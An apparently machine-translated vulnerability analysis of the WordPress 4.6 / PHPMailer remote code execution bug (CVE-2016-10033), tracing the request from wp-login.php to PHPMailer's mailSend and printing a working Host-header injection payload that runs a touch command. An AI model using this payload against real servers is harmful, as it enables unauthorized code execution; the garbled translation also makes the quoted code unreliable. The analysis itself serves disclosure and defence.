9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
WordPress 4.6 version remote code execution vulnerability is a very serious vulnerability, an unauthorized attacker to exploit the vulnerability will be able to achieve remote code execution against a target server for instant access, eventually leading to the target application server completely fall in. Without the need for plugins or non-standard settings, you can take advantage of the vulnerability. Dawid Golunski (@dawid_golunski) also in the poc shows us the wonderful alternative / and β β(indicates a space)skills.
0x01 vulnerability analysis
The whole process using WordPress is not on the request of the Host field for verification and PHPMailer in less than 5.2.20 version there is a code execution vulnerability. For more than two unsafe point of use, resulting in remote code execution.
The POC address is: WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033
We tested the command for the
/usr/bin/touch /tmp/manning. test
We look at the POC sent a request
! [](/Article/UploadPic/2017-5/20175615481996. png? www. myhack58. com)
The Host field is configured as follows
Host: target(any-froot@localhost-be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}manning. test}} null)
This point with our perception of the Host is completely different.
The next process is very simple.
In wp-login.php in the first, according to the request of the action route
! [](/Article/UploadPic/2017-5/20175615481809. png? www. myhack58. com)
Then enter the function retrieve_password
! [](/Article/UploadPic/2017-5/20175615481557. png? www. myhack58. com)
Then enter the wp_mail function located in the file pluggable.php
! [](/Article/UploadPic/2017-5/20175615481745. png? www. myhack58. com)
In wp_mail, WordPress will put _SERVER[βSERVER_NAMEβ] variable splicing to from_email variable.
! [](/Article/UploadPic/2017-5/20175615481353. png? www. myhack58. com)
After a series of message content stitching, the object of class phpmailer class variables have been assigned values, after entering the call to the Send function
! [](/Article/UploadPic/2017-5/20175615481642. png? www. myhack58. com)
Here the most critical mailSend function stick out, the mailSend function is responsible for the final call, key in the mailPassthru function, which will bring with malicious params variables to PHPMailer it.
protected function mailSend($header, $body)
{
$toArr = array();
foreach ($this->to as $toaddr) {
$toArr[] = $this->addrFormat($toaddr);
}
$to = implode(', β, $toArr);
if (empty($this->Sender)) {
$params = β β;
} else {
$params = sprintf(β-f%sβ, $this->Sender);
}
if ($this->Sender != "and ! ini_get(βsafe_modeβ)) {
$old_from = ini_get(βsendmail_fromβ);
ini_set(βsendmail_fromβ, $this->Sender);
}
$result = false;
if ($this->SingleTo && count($toArr) > 1) {
foreach ($toArr as $toAddr) {
$result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params);
$this->doCallback($result, array($toAddr), $this->cc, $this->bcc, $this->Subject, $body, $this->From);
}
} else {
$result = $this->mailPassthru($to, $this->Subject, $body, $header, $params);
$this->doCallback($result, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From);
}
if (isset($old_from)) {
ini_set(βsendmail_fromβ, $old_from);
}
if (!$ result) {
throw new phpmailerException($this->lang(βinstantiateβ), self::STOP_CRITICAL);
}
return true;
}
Dynamic debugging, in the mailPassthru the time of the call, the whole variables as shown in Fig.
! [](/Article/UploadPic/2017-5/20175615482840. png? www. myhack58. com)
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%